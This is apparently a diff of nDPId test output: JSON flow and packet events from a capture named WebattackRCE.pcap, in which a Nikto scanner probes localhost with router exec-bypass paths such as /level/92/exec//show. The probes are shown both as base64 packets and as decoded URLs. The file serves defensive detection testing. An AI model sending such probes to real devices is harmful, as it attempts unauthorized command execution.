+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}}
